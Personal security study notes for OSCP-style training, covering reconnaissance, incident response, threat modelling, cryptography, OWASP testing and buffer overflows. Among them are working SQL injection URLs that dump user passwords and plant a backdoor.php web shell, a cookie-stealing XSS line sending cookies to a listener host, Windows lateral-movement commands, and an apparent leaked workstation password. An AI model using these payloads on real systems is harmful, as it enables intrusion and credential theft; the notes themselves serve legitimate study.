OSCP Notes
ACE Training
# Advanced Threat Challenge Damage
Unexpected Strategic Impacts
Unexpected Risks
Unexpected Career Impacts
Unexpected Costs
Targeted Attacks
91% of targeted attacks begin with spear-phishing emails
Social Engineering helps
Public social information available (Facebook, Linkedin, etc.)
Targets one or multiple specific targets (not like malware, which is random)
Advanced methods evade traditional defenses
# Network Traffic Analysis
Advanced Reconnaissance: Attacker researches network, infrastructure and defenses
TCP Sequence and Acknowledgement = 32 bit numbers (Attacker can predict next Sequence and spoof the connection)
Follow TCP in Wireshark: Red = host that initiated the connection
Vulnerability = Security hole that can be exploited
OS fingerprinting using TTL and window size
Browser Vulnerabilities are not a risk of HTTP (but Client Side Attack)
Reconnaissance uses TCP/IP packets to determine the state of a port
DOS/DDOS sends huge amount of TCP/IP packets to the target to disrupt it’s connection (can be bounced off webservers etc. - Spoof victim’s IP and send GET requests to Webserver)
nmap
TCP SYN Scan (-sS) | Fastest scan. Only sends SYN, but no ACK or RST if host answers with SYN,ACK
**TCP ACK Scan (-sA) **| Maps out firewall rulesets and check if firewall is stateful
UDP Scan (-sU)
TCP FIN, Xmas and Null to exploit firewalls, depending on the system used. Non-stateful Firewalls and filtering Routers try to prevent incoming TCP connections, by blocking any TCP packets with the SYN bit set and ACK cleared, but allow outbound ones:
**Null Scan (-sN) **| Does not set any bits (TCP flag header is 0)
FIN Scan (-sF) | Sets just the TCP FIN bit
Xmas Scan (-sX) | Sets the FIN, PSH and URG flags, lighting the packet up like a Christmas tree
Email Envelop Header is read by Email clients and can hide the true sender/receiver
Envelop Header is read bottom to top where last hop is the only one to be “trusted"
Reverse NDR or Bounce Email Attack = Attacker uses NDR function of mailserver to send spam/phishing to victim
Email commands like VRFY, RCPT TO, EXPN can be used for reconnaissance
Open-Relay Servers accept mails from everyone
Defense in Depth
Multilayer** **protection
Decreases Attacker’s chance of success
Data - Strong passwords, ACLs, Backup and Restore strategy
Application - Application Hardening
Host - OS hardening, authentication, security update management, AV updates, auditing
Internal Network - Network segments, NIDS
Perimeter - Firewalls, Border Routers, VPNs with quarantine procedures
**Physical Security **- Guards, Locks, Tracking Devices
Policies, procedures and awareness - Education
Security Assessments
Vulnerability Scanning
Internal IT Security Auditing
Penetration Testing
Risk Management
Identify the Asset
What is the threat?
What is the vulnerability?
What is the risk?
What is the impact?
How to treat the threat?
Risk = Likelihood of incident occurs x Impact
Assess -> Evaluate -> Manage -> Measure -> ...
Make sure to have a Plan B
Incident Response
Preparation (Determine what kind of incident is likely in this environment) - Communications, Facilities, Hardware and Software supporting the Incident Response, resources and mitigation software. Risk Assessment, Host- and Network-Security, Malware Prevention, User Awareness and Training.
Detection and Analysis (Collect Logs, Alerts etc. and consolidate. Do not speculate or assume) - May involve different sources: Network Perimeter, Applications, Host System, People, Security/Assessment.
Containment, Eradication and Recovery (Make objective assessment of the situation, define strategy of containment, eradication and recovery - Stop bleeding, clean up, restore production) - Create Backups using bit-by-bit image copy to include ‘deleted files’. Take Action or Monitor, depending on the situation. In Stages 1 and 2 blocking would be a smart idea. Identify all affected hosts and remove malicious software and user accounts. Reset passwords. Rebuild compromised hosts and patch them. Run Network and System vulnerability analysis.
Post-Incident Activity (Discuss lessons learned and recommend steps to stop similar incident to occur again)
Risk Management is not part for Incident Response
No Detection = No Containment
Needs to be able to look back and forwards in time before and after the detection
Quick Enterprise-wide scanning first, then in-depth investigation and forensics on only some hosts
Incident Response focusses on bringing systems and production back online and prevent similar incidents
Digital Forensics assist law enforcement
Timeline analysis is key for investigation
Look for unusual processes (run by user account, obfuscated names) - procexp Tool (Show Details for all processes, Verify Image Signatures
Look for unusual network usage (with netstat -natob) - Tcpview Tool (Uncheck ‘Resolve Address’)
Look for unusual registry keys - Autoruns Tool (
Look for unusual Services (no code signing, no publisher)
Look for unusual files (timestamps, size, extensions)
Look for unusual User Accounts (net localgroup)
Look for unusual Log Entries (Windows Events, off-hour logins, remote logins)
Endpoint Sensor: https://www.trendmicro.com/en_us/business/products/user-protection/sps/endpoint/endpoint-sensor.html
# Risk of common Services
HTTP can be sniffed as it’s not encrypted. Vulnerable to Code Injection (Directory Traversal might be possible)
HTTPS is also vulnerable to Code Injection
Email/SMTP might not be encrypted, can be used for Social Engineering, can be used for spamming, phishing
FTP is not encrypted and credentials can be stolen. Undeclared connections (Unknown users might gain access)
DNS can be spoofed (DNS Poisoning) or redirected
Websites can be defaced
SQL Injection is possible when input is not sanitized (Input via Web Interface will run SQL command in the backend)
Cross-Site Request Forgery (Attacker forces victim into unwanted action while victim is currently authenticated with some service)
Cross-Site Scripting is used to inject client-side scripts (JavaScript/VBScript) that are executed when the victim visits the website
# Advanced Persistent Threat
**Advanced - **Malware, tools or hacking techniques are not always advanced. Advanced only if they need to be
**Persistent - **Not randomly selected targets. Patient (will try several exploits)
Threat
Main targets: Government, Industrial, Military
# Phases of Attacks
Intelligence Gathering
Point of Entry
C&C Communication
Lateral Movement
Asset / Data Discovery
Data Exfiltration
Phase 1: Attack Phase 2: Control Phase 3: Exfiltration
RTLO / LTRO - Right to Left Override - Left to Right Override
# Exploit Techniques
General Buffer Overflow
ROP (Return Oriented Programming) - Gains control of the call stack to hijack program control flow
**Heap Spraying - **Fill up Heap with NOP and shellcode
# Countermeasures
DEP (Data Execution Prevention) - Marks memory pages as non-executable preventing shellcode to run
ASLR (Address Space Layout Randomization) - Randomly arranges the address space positions of key data areas of a process, including the base of the executable and the positions of the stack, heap and libraries.
Webshell (example )
# Passwords AAD3B... - LM (empty password) 31D6C... - NTLM (empty password) LM can look empty, but NTLM could not
Rainbow Table (largest, but fastest) Brute Force (smallest) Dictionary Attack (smallest, medium)
HDD BF < Dict < RT CPU BF > Dict < RT
**# SMB password via ARP poisoning ** Attacker creates Static Challenges, not Responses
For exam: ssh might not be ssh
DS test: psexec
Windows Tools: wmic at (run job)
PSEXEC psexecsvc.exe stays on victim host
WMIC
AT
WCE List: # wce -l Change: # wce -s User:Domain:LM:NTLM Logged on: # wce -w
NETSH Map Drive: # net use x: \PC-NAME\C$ /user:DOMAIN\USER P@ssword Query time: # net time \PC-NAME
Connect: # net use \PC-NAME\admin$ /user:DOMAIN\USER P@assword (then: copy xy.exe \PC-NAME\admin$
Loop in Windows CMD:
for /l %i in (1, 1, 10) do ping -n 1 10.0.0.%i
WKS-Harry PW @Trend@
Projects A1 - Cork Wifi Safari A2 - Automate domain and DNS info scripts
B1 - PSC_Akbari Write PSC trap
Tasks T1 - Write MrC Banner T2 - Write Ports list T3 - Tools to check: sqlmap, grabber, sparta, DirBuster,
Completed Trainings: VMWare - Software Security Testing - Tools and Techniques VMWare - Fundamentals of Secure Development VMware - Fundamentals of Web 2.0 Security VMWare - Introduction to Cryptography VMWare - Buffer Overflows - Attacks and Countermeasures
Link Collection (01:13:07 PM) **Yassine Ilmi: **https://hacking101.eng.vmware.com/login/index (01:13:20 PM) **Yassine Ilmi: **https://hacking102.eng.vmware.com/login/index (01:13:34 PM) **Yassine Ilmi: **https://moosecon.eng.vmware.com/pa2016/ctf
(01:18:12 PM) **Yassine Ilmi: **https://vsecr-ctf.eng.vmware.com/index.php?p=game
https://take1.vmware.com/opportunities/7096
ISO/IEC 27000 definition of security terms Information asset: Knowledge or data that has a value to the organization
Threat: Potential cause of an unwanted incident, which may result in harm to a system
Vulnerability: Weakness of an asses that can be exploited by a threat
Security Attributes for Information Assets **Confidentiality -> **Encryption Integrity -> Input Validation and Access Controls Accountability -> Auditing and Logging Availability -> Error Handling and Resource Monitoring
STRIDE Model Classification
Spoofing: Faking the identity of a trusted entity and gaining access to or modifying assets
Tampering: Modifying data assets in a malicious or unintended manner
-> Threat against Intergrity (Spoofing against Authentication, Escalation of Privilige against Authorization)
Repudiation: Performing actions with no records of the actions being kept -> Threat against Accountability
Information Disclosure: Extracting confidential or otherwise harmful data through product implementation defects
-> Threat against 'Confidentiality'
Denial of Service: Causing the product or certain functions to respond very slowly or stop functioning
-> Threat against Availability
Escalation of Privilege: Raising the user role of an entity beyond the sanctioned limit
DREAD Model Classification
Damage Potential: How great is the damage if the vulnerability is exploited?
Reproducibility: How easy is it to reproduce the attack?
Affected Users: What percentage of users across various privileges can be affected?
Discoverability: How easy is it to find the vulnerability?
Source: https://msdn.microsoft.com/en-us/library/ff648644.aspx
Microsoft Security Development Lifecycle (SDL)
Test Planning
Attacker will try to abuse parts of the system that run with elevated privileges
Assume that the attacker has access to the source code and trade secrets
Assume that man-in-the-middle exists when communicating over the network
Expect all input to be malicious (do not trust users)
Never rely on client-side application security
Assume that the attacker has access to the internal network
Create test cases where the user of one role attempts to execute functions meant for other roles
If system is exposed to the internet, expect attackers to send continuous malformed data
Never rely on a single line of defense to protect the system
Static Analysis
Involves analysis of source code (does not require to execute the code and is performed with tools to automate the process)
Does not require a complete code base
Does not require a test case
Looks for security problems and suggests potential fixes
Can be performed during the implementation phase and test phase
It can detect:
Use of risky, outdated functions and technology
Buffer, arithmetic and array bounds overflow
Weak or outdated crypto issues
Memory and other resource leaks
Injection attacks such as XSS and SQL injection
Invalid pointer references
Race conditions
Advantages:
Fast scanning of large code base
Deep and consistent code coverage
Developers need not to be security experts
Provides remediation suggestions
Can detect problems early/cheaply
Disadvantages:
False positives or false negatives
Cannot detect design or architecture issues
Cannot scan third-party compiled libraries
Vulnerability Scanning
Involves automated scanning of running applications. Web-application scanning tools commonly scan applications by navigating through the application, applying inputs and then analyze the outputs. Uses known bad inputs to test for weaknesses. Scans large applications quickly. Provides suggestions for detected problems. Web-application scanners can detect the following:
Cross-site scripting
Access control weaknesses
Session management issues
Basic server security misconfiguration issues
Forced browsing and insecure direct object access
Weak configuration
Injection vulnerabilities
Vulnerability scanning should be performed during the implementation and testing phases. Also during maintenance phase after the product has been released.
Advantages:
Fast scanning large applications
Developers don't need to be security experts
Provides remediation suggestions
Can detect wide variety of problems before manual penetration tests
Disadvantages:
False positive or false negative
Cannot detect unknown vulnerability types
Creates a false sense of security
Fuzz Testing
Injects random noise data to check the behavior or output of the application. It can be completely random or structured. It's used to test input validation and parsing and data parsing robustness. Common problems detected by fuzz testing are Buffer- and Integer overflow and parsing issues as in XML or HTML. Common application entry points for fuzz testing are UI, form fields, APIs, Command line or URL parameters, network streams and input files.
Should be performed during implementation and test phase
Advantages:
Test using large amount of potential malicious data
Useful finding buffer and integer overflow vulnerabilities
Discovery can be performed by a non-security Engineer
Disadvantages:
Does not provide remediation steps
Detection relies on proper configuration and targeting of tools
Fixing requires an experienced security engineer
Penetration Testing
Uses tools, scanners, customer scripts and is a manual effort. Testers act as application users in a realistic environment. Can help uncover vulnerabilities that a scanner can not detect. Requires very experienced security engineer.
This should be performed in the test phase after automated testing is finished. Should also be performed during maintenance phase after product has been released.
Advantages:
Can detect vulnerabilities in architecture and design
Tests can be highly customized
Disadvantages:
Very time consuming
Requires very experienced security engineer
Tests can not be reused as they are highly customized
Is conducted late in the SDLC, so fixes are expensive
Data Interception and Manipulation
Helps to determine if application can maintain confidentiality by using appropriate encryption and integrity by using effective input validation. Interception and Manipulation can be performed at data interfaces such as web browser traffic, files, API and other network traffic via HTTP proxy, packet analysis and tampering.
Basic steps are to identify the interception point and techniques to use, then determine the manipulation strategy such as random or context-sensitive manipulation.
HTTP proxy tools monitor HTTP and HTTPS requests and responses to check for information leakage and learn about the internal workings of the web application. Tests to modify traffic:
Fuzzing: URL parameters, field values, metadata Session analysis: Hijacking, fixation, replay Injection attacks: XSS, SQL, XML and XPath
Web Security SOAP (Simple Object Access Protocol) https://en.wikipedia.org/wiki/SOAP
WSDL (Web Services Description Language) https://en.wikipedia.org/wiki/Web_Services_Description_Language
AJAX (asynchronous JavaScript and XML) https://en.wikipedia.org/wiki/Ajax_(programming)
Web Syndication https://en.wikipedia.org/wiki/Web_syndication
Web Attacks:
XML Injection
XPath Injection
Coercive Parsing
Oversized SOAP
SOAP Array
SOAP Parameter Tampering
XSS (Cross-Site Scripting)
CSRF (Cross-Site Request Forgery)
Best Practice to secure Web Services
Protect the WSDL (Use proper access control. Do not rely on secrecy.)
Use SOAP header authentication
Digitally sign the SOAP message or encrypt it to prevent data manipulation on the wire
Prevent eavesdropping by securing the transport using SSL or IPsec
Hide internal objects of the service by using XML address translation to map between private and internal data and their external reference
Use XML filtering to protect against bad data and injection attacks
Validate and neutralise input using blacklists and whitelists
Do not trust the client browser
Manage sessions securely
Use built-in session management frameworks
Store only the session ID on the client side (everything else on the server)
Expire sessions after inactivity
Generate secure session IDs (should not be predictable or contain user data)
Require that cookies are sent only over SSL/TLS connections
Prevent client side scripts from accessing the cookies
Re-authenticate after critical operations
Re-authenticate after a preset time limit
Cryptography
Stream Ciphers: Symmetric cipher operating in plain text one bit (or byte) at a time. Plaintext stream going into the Algorithm, stream of ciphertext coming out. Examples: A5/1, RC4, SEAL.
Weaknesses: Easy to misuse. Two different plain texts that are encrypted will be easily to decrypt. No integrity checking.
Strengths: Very fast. Easy to implement. Easy reversible, as the same algorithm is used for both encryption and decryption.
Block Ciphers: A block cipher is a symmetric cipher that operates on a fixed number of bits of plaintext, referred to as a block, at the same time in order to produce a corresponding block of output. The number of bits that are operated on at one time is called the block size. The cipher key is used to control how each block gets transformed. Block ciphers apply the same transformations to each block multiple times where each application is known as a round. The processing of each block is thus completely independent of the processing of other blocks. Examples: DES, 3DES, RC2, RC5, AES
Operator Modes: ECB, CBC, CFB, OFB, CTR
Weaknesses: If two blocks of plaintext are identical, then the ciphertext for both will also be identical. Slow, compared to stream ciphers. Requires proper understanding of the mode of operation.
Strengths: More resilient to attacks compared to stream ciphers. Recommended by several national standards, in particular AES
Asymmetric Cryptography
How does public-key cryptography work? The idea behind it is very simple. Public-key cryptography is possible because there exist mathematical transformations that are very easy to compute, but whose inverse transformations are very difficult to compute. A common example is multiplying and factoring. It is very easy to algorithmically multiply two prime numbers together to form a large number, but it is much more difficult to factor that large number back down to the original two prime numbers. Another example is exponentiation and logarithms using modular arithmetic. This can be seen by looking at the equation: Z=X^Y mod(N). Given X, Y, and N, it is very easy to algorithmically compute Z; this is the exponentiation problem. On the other hand, given Z, Y, and N, it is very difficult to compute X; this is the logarithm problem. However, if the prime factors of N are known, then a shortcut exists to easily compute X. So if N is specially chosen to be the product of two large primes, say P and Q, then only someone who knows P and Q will be able to calculate X given Z and Y.
Asymmetric Ciphers: RSA, Deffie-Hellmann, EIGamal, ECDH Hashes: MD5, SHA-1, SHA-2
Cryptographic Protocols
SSL/TLS: SSL/TLS is a cryptographic protocol that allows secure communication over the Internet. As data is encrypted at the application layer, this protocol provides security for services such as Web browsing, e-mail, and instant messaging.
IPSec: IPSec is a protocol that provides security at the network layer. In order to provide security, this protocol provides means for encrypting and/or authenticating each IP packet of the network stream.
S/MIME: Secure/Multipurpose Internet Mail Extensions is a protocol for securing e-mail communications.
XML-DSig: XML Signature is a W3C recommendation aimed towards signing XML documents. It is used by various web-based technologies such as SOAP and SAML.
WS-Security: Web Services Security is a protocol providing security to Web services. This protocol defines means for enforcing confidentiality and integrity of Web services messages.
Key derivation is the process of deriving cryptographic keys from a randomly generated secret number and/or other known information such as a passphrase.
Industry wide best practices dictate developers to:
Not use direct hashing of passwords or passphrases as means for deriving short-term cryptographic keys used in sessions.
Not use direct hashing of passwords or passphrases as means for deriving long-term, static cryptographic keys unless such decision is supported by a well-adopted standard.
Use a standard key derivation function such as CryptDeriveKey from the Microsoft Windows CryptoAPI and KeyPairGenerator in Java.
Network Protocols on OSI Model
IPSec: Security/Encryption on Layer 3. Applications don’t need to be aware of this
SNMP: Ports 161 and 162. Network Monitoring on Application Layer SSH: Secure Shell. Port 22. Transport Layer Telnet: Port 23. Application Layer DNS: Port 53 UDP/TCP
Test for OWASP Top 10
A1: Injection SQL Injection Example:
String query = "SELECT * FROM accounts WHERE custID=' " + request.getParameter("id") +" ' “;
Allows to break out of this command and execute other code on the database.
How to check for SQL Injection?
Identify if the feature you are testing retrieves or stores content from or to a backend database.
Identify if it uses user input to form the backend query.
Identify the request parameters from which it extracts user input.
Identify the data type of the parameter stored in the database if possible.
Create a fuzz list, which contains a variety of payloads that you can use to fuzz the backend database. You want to be able to run your own queries.
Use a fuzzer, which uses these payloads in every request parameter that is a target.
Study the responses generated by the application in response to various payloads used while fuzzing the database.
To test for SQL injection, identify all input fields used to craft SQL queries within the application. This includes hidden fields of POST requests. Test each field separately and then in combination if possible.
It is also critical to consider the information stored in HTTP headers and cookies that is passed back and forth between the browser and the SQL application.
The two most common initial tests of a SQL application are:
Adding a single quote (‘), which terminates a string in SQL syntax.
Adding a semicolon (;), which terminates a SQL statement.
In both cases, if these tokens are not filtered by the SQL application, an error is generated and can result in data leakage or command execution.
If input is not sanitised, you can break the query by adding a quote:
http://10.0.0.0/comment.php?id=553'
Using ‘order by’ to query the database structure. Increasing the column number until you get an error gives you the information about the number of columns in the database:
http://10.0.0.0/comment.php?id=553 order by 1
Showing the position of data and tables with ‘union select’ and enter the number of columns figured out with the ‘order by’ query (pretending we have 6 in the example):
http://10.0.0.0/comment.php?id=553 union all select 1,2,3,4,5,6
When this works, we can add SQL queries after this (Example: Getting the SQL version):
http://10.0.0.0/comment.php?id=553 union all select 1,2,3,4,@@version,6 Useful SQL commands:
Get SQL version @@version
Show current database user: user()
Open a file on the remote host: load_file(‘c:/windows/system32/bla.ini’)
Write a file to the remote host: “<php? echo something;?>, x into OUTFILE ‘c:/windows/system32/wirus.exe'
Show all tables: table_name FROM information_schema.tables
Example for showing all tables:
http://10.0.0.0/comment.php?id=553 union all select 1,2,3,4,table_name,6 FROM information_schema.tables
Example for extracting values from the ‘users’ table:
http://10.0.0.0/comment.php?id=553 union all select 1,2,3,4,concat(name,0x3a,password),6 FROM users
Example for opening a file on the remote host:
http://10.0.0.0/comment.php?id=553 union all select 1,2,3,4,load_file(‘c:/windows/system32/bla.ini’),6
Example for writing shell code to remote host:
http://10.0.0.0/comment.php?id=553 union all select 1,2,3,4,””, 6 into OUTFILE ‘c:/xampp/htdocs/backdoor.php’
http://10.0.0.0/backdoor.php?cmd=ipconfig
OS command injection Example: String script = System.getProperty("SCRIPTNAME"); if (script != null) Runtime.exec(script);
Java Call to Runtime.exec function allows attacker to execute any command on the system if they can control the SCRIPTNAME property.
How to check for Command Injection?
Identify any code within the application capable of passing user supplied data to the system shell.
Identify the request parameters that it extracts user input from.
Create a fuzz list, which contains a variety of payloads that you can use to fuzz the OS command that is being used. You want to be able to run your own commands.
Use a fuzzer, which uses these payloads in every request parameter that is a target.
Determine if the payloads used to create an OS command cause the application to behave differently.
Confirm the possibility of OS command injection by creating a new file and check for its existence. You can also initiate network connections to a server that you control and monitor its network traffic.
LDAP injection Example:
In this example, accomplishing LDAP injection is dependent on whether the variable $username is validated or not. For example, if an attacker inputs “*” in place of $username, and the input is not validated, the system might return all the usernames in the LDAP database.
String ldapSearchQuery = "(cn=" + $userName + ")"; System.out.println(ldapSearchQuery);
To test for LDAP injection, manipulate the input parameters submitted to the LDAP server, which are then passed to internal search, add, and modify functions. The goal is to identify metacharacters in a query which, when executed by the application, result in unauthorized access to content, data leakage, application restriction evasion, and potential modification of objects within an LDAP tree structure.
How to check for LDAP Injection?
Determine if the feature you are testing interacts with an LDAP database.
Determine if it uses user input to form the query it runs.
Identify the search filter meta-characters from which it extracts user input.
Create a fuzz list, which contains a variety of payloads that you can use to fuzz the LDAP query being used. You want to be able to run your own queries.
XLM and XPath injection How to check for XML Injection?
Determine if the feature you are testing reads or writes from or to an XML file.
Identify if it uses user input to form the query it runs.
Identify the request parameters from which it extracts user input.
Create a fuzz list, which contains a variety of payloads that you can use to fuzz the XPath query that is being used. You want to be able to run your own queries.
Use a fuzzer, which uses these payloads in every request parameter that is a target.
Determine whether the application handles malformed XML input gracefully.
Determine whether the application is vulnerable to XML entity injection or expansion attacks by checking if the parser expands XML entities.
To test for XML injection, manipulate or compromise the logic of an XML service or application by injecting unintended content or structures into the parser. An attack is successful if the XML parser fails to properly validate the data.
Testing for XML injection includes:
Meta-character injection
External entity injection
Tag injection
Buffer overflow
A2: Authentication/Sessions Use the following steps to identify these vulnerabilities:
Check if credentials are protected when stored using hashing or encryption. This is possible only if access to the source code is available.
Check if account management functions, such as account creation, password changes, password recovery, and weak session IDs, are implemented in a secure manner.
Check if session IDs are transmitted as query string parameters in the URL.
Check if session IDs are changed after a user successfully logs in to the application.
Check if session IDs time out after a period of inactivity.
Ensure that the application allows a user to log out and terminates the session on the server.
Ensure that all passwords, session IDs, and other sensitive information are sent only over TLS.
Check if a Web application allows a user to authenticate using a previous or existing session ID.
Check if you are able to force a known session ID on a user.
A3: Cross-Site Scripting (XSS) Threats related to XSS include:
Stealing the user’s session information that is usually stored in a session cookie.
Executing malicious code in the user’s browser.
Gaining complete control of the user’s system.
Storing malicious content in the database that will get executed by other users when it is viewed.
How to check for XSS?
Determine if the feature that is being tested uses user input.
Identify the request parameters from which it extracts user input.
Create a fuzz list, which contains a variety of payloads that you can use to fuzz the backend business logic that is being used. You want to inject malicious JavaScript, have it processed by the backend business logic, and render it on the end user’s browser.
Use a fuzzer, which uses these payloads in every request parameter that is a target.
Determine whether user-supplied input is echoed in the response to a request.
Determine if all user-supplied input sent back to the browser is verified to be safe (through input validation).
Determine if user input is properly escaped depending on the context of the data before including on the output page.
Mozilla Firefox Addons for XSS: https://addons.mozilla.org/en-US/firefox/addon/cookies-manager-plus/ https://addons.mozilla.org/en-US/firefox/addon/tamper-data/
Guestbooks on Webservers are usually easy to exploit. Quick Script to test if site is vulnerable:
alert(“bla”)
Injecting invisible iframe code to redirect to another website:
Cookie stealing by injecting JavaScript:
new Image().src=“http://10.11.0.115/bogus.php?output=“+document.cookie;
Open a listener on the other side: # nc -vlp 80
Replace the cookie and reload the website.
A4: Insecure Direct Object References A5: Security Misconfiguration To check for security misconfiguration:
Software up-to-date?
Development framework [(ASP.NET](http://(asp.net/). etc) set to their secure values?
How much details are revealed in application error messages and backtraces?
Unnecessary ports open or service accounts present?
A6: Sensitive Data Exposure
This can include credit card data, social security data and authentication credentials. Common conditions that can lead to exposure of data:
Lack of transport layer security (SSL/TLS)
Insufficient protected credentials
Insecure cryptographic storage
To check for sensitive data exposure in your Web application, look for the following conditions:
Sensitive data transmitted without SSL/TLS.
Sensitive data stored in an unencrypted form.
Custom algorithms used to protect data at rest or provide integrity verification. Even in-house implementations of known algorithms such as AES can be problematic.
Direct use of low-level cryptographic APIs. For example, directly using the encrypt method from an AES class without a strong cipher mode like CBC can lead to severe cryptographic weaknesses.
Use of outdated or known insecure algorithms, such as RC3, RC4, DES, MD5, and SHA1.
Storage of cryptographic keys or other constants in code or in other insecure locations.
Do not use outdated or insecure algorithms. Use industry-approved strong algorithms such as AES with a 256 bit key size, the SHA2 family of hashing algorithms (SHA256, SHA512), and RSA for public key operations using key sizes of 2048 bits or greater.
A7: Missing function level access controls
A8: Cross-Site request forgery (CSRF)
A9: Using components with know vulnerabilities A10: Unvalidated Redirects and Forwards
Buffer Overflows - Attacks and Countermeasures
Definition of 'Heap': the heap is the portion of memory where dynamically allocated memory resides (i.e. memory allocated via malloc). Memory allocated from the heap will remain allocated until one of the following occurs:
The memory is free'd
The program terminates
If all references to allocated memory are lost (e.g. you don't store a pointer to it anymore), you have what is called a memory leak. This is where the memory has still been allocated, but you have no easy way of accessing it anymore. Leaked memory cannot be reclaimed for future memory allocations, but when the program ends the memory will be free'd up by the operating system.
Heap Spraying
Although an attacker may be able to trigger a buffer overflow condition, the attacker might not be able to use the stack to store and execute a malicious payload. The heap can be used in these cases to overcome this limitation. Although it is possible to redirect execution into the heap, it is sometimes hard to predict where exactly it will land. For this reason, a technique known as heap spraying is used to increase the likelihood of execution hitting actual shellcode in the heap.
Heap spraying consists of filling up the heap with blocks of shellcode preceded by a NOP sled.
When the attacker exploits the buffer overflow, the value of the return address is overwritten to redirect the program’s execution flow into the heap. Since the heap is filled with shellcode, the attacker does not have to predict accurately where the instruction pointer will land and can be fairly confident that the shellcode will be executed.
Heap-based Buffer Overflows
The heap is the area of program memory used to hold variables that are dynamically allocated. The heap is a double-linked list, each element of which consists of a block of data and pointers to the previous and next elements in the list. When a program writes more data in a heap variable than there is memory allocated for that heap variable, areas of the heap that control the execution of the program can be overwritten, potentially resulting in a program crash. By submitting specially crafted data to the application, an attacker can control the overwritten portions of the heap and force the execution of the program to point to an arbitrary location that may contain malicious code.
Definition of 'stack based Buffer': The stack is the memory set aside as scratch space for a thread of execution. When a function is called, a block is reserved on the top of the stack for local variables and some bookkeeping data. When that function returns, the block becomes unused and can be used the next time a function is called. The stack is always reserved in a LIFO (last in first out) order; the most recently reserved block is always the next block to be freed. This makes it really simple to keep track of the stack; freeing a block from the stack is nothing more than adjusting one pointer.
Code written in **Perl **and **JavaScript **is immune to buffer overflows. Buffer overflow attack against **C# **or **Java **results in denial of service.
Programs written in C, C++, Fortan or **Assembly **will allow to fully compromise the system.
Example: Stack size limit is 16 characters. Pushing more than 16 characters onto the stack will lead to an overflow:
The problem with low-memory addresses:
Unlike Unix, Linux, and other operating systems, the Windows stack is located in low-memory locations.
Referencing such memory locations in exploit code would require the use of 00 (NULL byte). Because NULL bytes are used as string terminators, referencing a memory location with an address containing a 00 may cause the exploit code to be truncated when functions such as *strcpy *are used. Therefore alternative techniques must be used for referencing low-memory addresses.
A crashing program or process might reveal where the shell code is being executed in memory (look for jmp ebx) and can be used as a starting point.
Some examples of *mov *instructions using address computations are:
mov eax, [ebx] ; Move the 4 bytes in memory at the address contained in EBX into EAX
mov [var], ebx ; Move the contents of EBX into the 4 bytes at memory address var. (Note, var is a 32-bit constant).
mov eax, [esi-4] ; Move 4 bytes at memory address ESI + (-4) into EAX
mov [esi+eax], cl ; Move the contents of CL into the byte at address ESI+EAX
mov edx, [esi+4ebx] ; Move the 4 bytes of data at address ESI+4EBX into EDX
When an application registers an exception handler, an EXCEPTION_REGISTRATION structure is pushed onto the stack.
Because each EXCEPTION_REGISTRATION structure references the next EXCEPTION_REGISTRATION structure inside the application, overwriting such a structure will ensure that any code referenced by the structure will get executed.
Therefore overwriting these structures has become a venue for an attacker to ensure that their payload will get executed.
Single-byte and Multi-byte NOP Sleds
One of the main problems that attackers face when executing malicious shellcode is finding the precise beginning of their payload. Not finding the precise beginning of the shellcode will cause the processor to execute garbled instructions, which will force the application to abruptly terminate.
To overcome this constraint, attackers use a technique called NOP Sledding. A NOP sled is a buffer that consists of single-byte NOP (No-OPeration) instructions. The x86 assembly opcode for the NOP instruction is \x90.
Once created, the NOP sled is placed right before the shellcode. When the EIP register points to anywhere within the NOP sled, the CPU will execute these NOP instructions before executing the malicious payload.
This technique reduces the need to jump to the exact beginning of the payload and increases the chances that the processor will execute the intended payload.
This might be detected by Intrusion Detection Systems. To avoid this, produce multi-byte sleds that are harder to detect, but will have the same effect. This will also produce valid instructions (No-OPeration) regardless of where the execution pointer lands.
Payloads are passed to the application as input. As such, they can be modified through operations such as upcasing, downcasing, copying, and ascii-to-unicode conversions.
These transformations can cause the exploit to be rendered ineffective. In order to preserve their payloads, attackers often encode their shellcode.
Encoding allows attackers to write arbitrary instructions in their shellcode without the need to avoid restricted characters. The shellcode then needs to contain a decoder in order to decode the payload once the flow of execution has been hijacked.
Metasploit Framework includes NOP generators.
Finding the executed code in memory
Executing the code using NOP Sled will lead to the fact that the exact location in memory is unknown. To solve this issue, increment the EIP register by 5 bytes; Example:
77bfc040 E800000000 call 0x5 77bfc045 58 pop eax
When call *0x5 *is executed, the value of the EIP register, the instruction pointer, is incremented by 5 which causes the instruction located 5 bytes after the original location of EIP to be executed. Because the value of EIP is pushed last on the stack when a call instruction is executed, performing a pop eax will copy that value into the EAX register.
Small buffers provide an obstacle when developing exploit code. To overcome the constraints of small buffers, attackers typically use a two-staged approach when constructing their shellcode. Using this approach, the shellcode is split into two parts: the exploit and the payload. Stored on the stack, the exploit is used for gaining control over the vulnerable system. Once the exploit succeeds, it redirects the execution into the payload. Stored at another location in memory, the payload performs the attacker’s intended malicious activity. Storing the payload in memory can be done via the following approaches:
Pre-loading. The attacker can force the application to load the payload in memory by submitting the payload via a valid input vector. This approach guarantees that the payload is already in memory when the attack is conducted.
Download. In another approach, the attacker may use the exploit to download the payload from a remote location and store it in memory. Once the download is complete, the payload is executed.
Shellcode often needs to redirect the execution flow to a location whose address is stored in the stack. In such cases, the *RET *assembly instruction can be used to retrieve the value placed at the top of the stack and store it in the EIP register.
If the desired value is not stored at the top of the stack, a series of *POP *instructions followed by a *RET *will allow an attacker to walk down the stack and jump to the address of interest.
Format String Vulnerabilities
Format string attacks, as their name suggests, target functions that take format strings as arguments, such as the C language *printf *family of functions. Format specifiers embedded within these format strings describe how to process subsequent parameters of the function. If these parameters are not properly validated, it is possible to force the application to deviate from its intended behavior. By providing access to values stored on the stack, these attacks can have many different effects ranging from erroneous program behavior and program crashes to information disclosure and execution of arbitrary code. The format string passed was the expected one; the program continues normally. The format string passed to the *printf *function allowed for the password to be read from memory, thus enabling information disclosure. The format string passed to the *printf *function allowed an attacker to overwrite an arbitrary memory location, this could potentially allow the attacker to execute malicious code.
Buffer Overflow Countermeasures (Windows OS)
Address Space Layout Randomization (ASLR) is a technique that is intended to prevent attackers from exploiting buffer overflow vulnerabilities. Most buffer overflow exploits are possible due to the predictability of the addresses of loaded libraries, stack frames, and heap allocations. Using ASLR prevents such exploits from successfully executing by making it hard to predict where required resources are loaded. Specifically, ASLR affects the application’s memory space in the following manners:
Image randomization: The addresses where EXEs and DLLs are loaded are randomized.
Stack randomization: The starting address for each thread’s stack is randomized.
Heap randomization: The base address for heap allocations is randomized.
Bypassing ASLR:
